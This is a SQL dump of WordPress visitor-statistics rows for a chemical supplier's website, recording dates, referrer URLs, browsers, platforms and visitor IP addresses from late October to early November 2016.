INSERT INTO `wp_statistics_visitor` VALUES (14217, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '132.3.33.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14218, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14219, '2016-10-31', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '4.35.26.162', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14220, '2016-10-31', 'https://www.miller-stephenson.com/military-spec-chemicals/', 'MSIE', 'Windows', '9.0', '', '204.79.180.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14221, '2016-10-31', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjdroGc64XQAhXYL4EKHVjNBYAYABAA&sig=AOD64_2Ukk-fBOGe9c_IVabKU9uxSS2Twg&rct=j&q=&ved=0ahUKEwjghPub64XQAhWGRSYKHTj4CZIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '63.157.112.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14222, '2016-10-31', 'https://www.google.ca/', 'Safari', 'iPhone', '8.0', '', '208.94.28.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14223, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.170.82.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14224, '2016-10-31', 'https://www.google.com/', 'Safari', 'iPhone', '9.0', '', '107.130.31.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14225, '2016-10-31', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '91.200.12.12', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14226, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.200.12.12', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14227, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '104.132.0.71', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14228, '2016-10-31', 'https://www.miller-stephenson.com/miller/about.html', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.71.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14229, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '98.6.112.50', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14230, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '6.2.8', '', '99.244.8.102', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14231, '2016-10-31', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '70.25.4.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14232, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11', '', '98.177.179.179', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14233, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14234, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.14', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14235, '2016-10-31', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '54.0.2840.68', '', '173.56.240.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14236, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.170.159.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14237, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '65.29.153.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14238, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCAQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&ei=4rIXWKDJDdrn3Qb-Ng&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '66.102.6.119', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14239, '2016-10-31', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '11.0', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14240, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/', 'MSIE', 'Windows', '11.0', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14241, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/', 'MSIE', 'Windows', '11.0', '', '66.249.88.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14242, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/', 'MSIE', 'Windows', '11.0', '', '66.249.88.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14243, '2016-10-31', 'https://www.miller-stephenson.com/contact_us.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.20.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14244, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '188.171.9.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14245, '2016-10-31', 'https://www.miller-stephenson.com/product/xp-1a0/', 'Safari', 'iPhone', '7.0', '', '131.253.27.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14246, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '130.203.108.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14247, '2016-10-31', 'https://www.google.ca/', 'Chrome', 'Windows', '54.0.2840.71', '', '24.65.129.151', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14248, '2016-10-31', 'https://www.google.com.mx/', 'Chrome', 'Windows', '54.0.2840.71', '', '187.178.207.53', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14249, '2016-10-31', 'https://www.google.com/search?ei=qrYXWLylK-PbjwSjjbyQCA&q=krytox+grease&oq=kryox&gs_l=mobile-gws-serp.1.1.0i10k1l5.4798.13377.0.16062.19.14.0.1.1.0.679.3081.0j5j5j0j1j1.12.0....0...1c.1.64.mobile-gws-serp..12.7.1998.3..0j41j0i131k1j0i67k1j0i46i67k1j46i67k1.HVTcQyLOfLM', 'Chrome', 'Android', '44.0.2403.133', '', '66.87.116.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14250, '2016-10-31', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&sqi=2&ved=0ahUKEwi8j9zi_4XQAhWCDiwKHT8ODewQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.137132246,d.amc', 'MSIE', 'Windows', '11.0', '', '138.210.118.82', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14251, '2016-10-31', 'https://www.google.com.au/url?url=https://www.miller-stephenson.com/product/dry-film-ptfe-release-agent/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiv0K_vgIbQAhVDnJQKHXRkDGgQFggyMAM&usg=AFQjCNHo2Vb_MUq70hW8VUipRhwhnStW5Q', 'MSIE', 'Windows', '8.0', '', '203.6.77.2', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14252, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '203.6.77.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14253, '2016-10-31', 'https://www.google.com.au', 'Firefox', 'Windows', '38.0', '', '203.6.77.2', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14254, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '39.50.26.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14255, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '217.12.33.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14256, '2016-10-31', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '192.208.239.178', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14257, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.204.62.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14258, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '7.0.3', '', '104.131.63.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14259, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '28.0', '', '104.131.63.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14260, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.131', '', '104.131.63.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14261, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '104.131.63.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14262, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '45.55.134.5', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14263, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '71.201.165.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14264, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '63.145.101.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14265, '2016-10-31', 'https://www.bing.com/search?q=miller-stephenson+chemical+co&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.239', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14266, '2016-10-31', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '204.79.180.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14267, '2016-10-31', 'https://www.bing.com/search?q=heloxy+modifier+61+sds&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14268, '2016-10-31', 'https://www.miller-stephenson.com/product/heloxy-61/', 'MSIE', 'Windows', '9.0', '', '204.79.180.178', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14269, '2016-10-31', 'https://www.miller-stephenson.com/miller/krytox.html', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.108.107', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14270, '2016-10-31', 'https://www.miller-stephenson.com/miller/conformal_coating.html', 'Chrome', 'Windows', '49.0.2623.112', '', '207.91.154.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14271, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.155.100.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14272, '2016-10-31', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14273, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14274, '2016-10-31', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '45.51.180.98', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14275, '2016-10-31', 'https://www.google.ca/', 'Firefox', 'Windows', '48.0', '', '130.63.142.222', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14276, '2016-10-31', 'https://www.bing.com/search?q=heloxy+modifier+61+sds&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14277, '2016-10-31', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/heloxyepoxy-functional-modifiers/', 'MSIE', 'Windows', '9.0', '', '204.79.180.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14278, '2016-10-31', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.196.42.175', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14279, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14280, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '43.0', '', '104.196.42.175', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14281, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14282, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '43.0.2357.125', '', '104.196.42.175', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14283, '2016-10-31', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.2', '', '104.196.42.175', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14284, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '43.0', '', '104.196.42.175', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14285, '2016-10-31', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '104.196.42.175', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14286, '2016-10-31', 'https://www.miller-stephenson.com', 'Firefox', 'Macintosh', '43.0', '', '104.196.42.175', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14287, '2016-10-31', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '104.196.42.175', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14288, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.166', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14289, '2016-10-31', 'https://krasivoe-hd.net/', 'MSIE', 'Windows', '4.01', '', '46.119.118.233', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14290, '2016-10-31', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.71.64.37', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14291, '2016-10-31', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14292, '2016-10-31', 'https://www.miller-stephenson.com/krytox-tm7-for-tire-mold-industry/', 'Chrome', 'Windows', '36.0.1985.97', '', '192.126.162.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14293, '2016-10-31', 'https://www.miller-stephenson.com/krytox-tm7-tire-mold-industry/', 'Chrome', 'Windows', '36.0.1985.97', '', '69.162.159.13', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14294, '2016-11-01', 'https://www.google.ca/', 'Chrome', 'Android', '54.0.2840.68', '', '184.160.157.241', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14295, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '39.0.2171.99', '', '66.249.79.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14296, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Safari', 'Macintosh', '10.0.1', '', '24.144.122.18', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14297, '2016-11-01', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '10.0', '', '24.228.193.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14298, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '5.44.119.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14299, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '76.219.237.67', '000', 35, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14300, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '78.188.171.84', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14301, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.245.84', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14302, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Macintosh', '43.0.2357.134', '', '137.229.131.34', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14303, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '180.70.242.140', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14304, '2016-11-01', 'https://search.yahoo.co.jp/', 'Edge', 'Windows', '14.14393', '', '114.171.60.110', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14305, '2016-11-01', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.248.197.91', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14306, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14307, '2016-11-01', 'https://www.google.com.hk/', 'Chrome', 'Windows', '54.0.2840.71', '', '203.18.50.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14308, '2016-11-01', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '76.14.87.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14309, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.54.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14310, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14311, '2016-11-01', '8461A67F1D263187B9223.203.208.50', 'MSIE', 'Windows', '9.0', '', '180.153.163.190', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14312, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '67.251.212.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14313, '2016-11-01', 'https://www.google.com/', 'Firefox', 'Macintosh', '49.0', '', '140.254.77.150', '000', 22, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14314, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Android', '38.0.2125.102', '', '5.74.92.102', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14315, '2016-11-01', 'https://www.google.co.jp/', 'Safari', 'Macintosh', '9.1.3', '', '150.29.61.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14316, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14317, '2016-11-01', 'https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/', 'MSIE', 'Windows', '9.0', '', '204.79.180.236', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14318, '2016-11-01', 'https://www.google.com.sg/', 'Chrome', 'Windows', '54.0.2840.71', '', '202.79.209.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14319, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '68.14.153.254', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14320, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '600.1.4', '', '99.111.93.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14321, '2016-11-01', 'https://www.google.com.tw/', 'Chrome', 'Windows', '49.0.2623.112', '', '59.126.9.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14322, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14323, '2016-11-01', 'https://www.google.ca/', 'Safari', 'iPad', '8.0', '', '70.24.138.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14324, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.25.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14325, '2016-11-01', 'https://www.google.ca/aclk?sa=L&ai=DChcSEwjGjdGTxYbQAhUHCmkKHdrpB6MYABAA&sig=AOD64_1v0kKi68SYk5DkRI9I7K3kyKDihQ&rct=j&q=&ved=0ahUKEwjfkc2TxYbQAhUK4YMKHYktClsQ0QwIHA&adurl=', 'MSIE', 'Windows', '11.0', '', '207.164.152.162', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14326, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '534.34', '', '84.200.68.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14327, '2016-11-01', 'https://www.miller-stephenson.com/', 'Safari', 'Linux', '534.34', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14328, '2016-11-01', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14329, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14330, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '27.0.1453', '', '10.191.169.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14331, '2016-11-01', 'https://www.miller-stephenson.com/', 'Chrome', 'Android', '27.0.1453', '', '65.57.245.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14332, '2016-11-01', 'https://www.adsensecustomsearchads.com/', 'Safari', 'Macintosh', '10.0.1', '', '173.170.207.233', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14333, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '123.126.68.100', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14334, '2016-11-01', 'https://www.timer4web.com/domain/miller-stephenson.com', 'MSIE', 'Unknown', '6.0', '', '148.251.190.210', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14335, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14336, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '193.146.134.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14337, '2016-11-01', 'https://www.bing.com/search?q=vazo+67&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14338, '2016-11-01', 'https://www.miller-stephenson.com/product/vazo-67-radical-initiator/', 'MSIE', 'Windows', '9.0', '', '204.79.180.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14339, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.35.94.200', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14340, '2016-11-01', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '43.0', '', '142.54.183.123', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14341, '2016-11-01', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.8.0', '', '209.29.240.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14342, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '195.154.225.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14343, '2016-11-01', 'https://telegramdownload10.com/', 'MSIE', 'Windows', '5.5', '', '5.248.253.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14344, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '124.137.0.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14345, '2016-11-01', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '86.123.240.6', '000', 45, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14346, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '183.13.66.89', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14347, '2016-11-01', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '207.181.211.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14348, '2016-11-01', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.71', '', '75.128.12.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14349, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.65', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14350, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.53', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14351, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '113.128.63.87', '000', 47, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14352, '2016-11-01', 'https://www.google.co.in/', 'Chrome', 'Windows', '54.0.2840.71', '', '10.107.165.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14353, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14354, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '46.0.2490.86', '', '203.217.243.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14355, '2016-11-01', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '184.70.181.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14356, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14357, '2016-11-01', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14358, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '117.201.165.109', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14359, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.93', '', '45.41.60.61', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (14360, '2016-11-01', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '51.0.2704.103', '', '54.90.41.238', '000', 2, 0); 
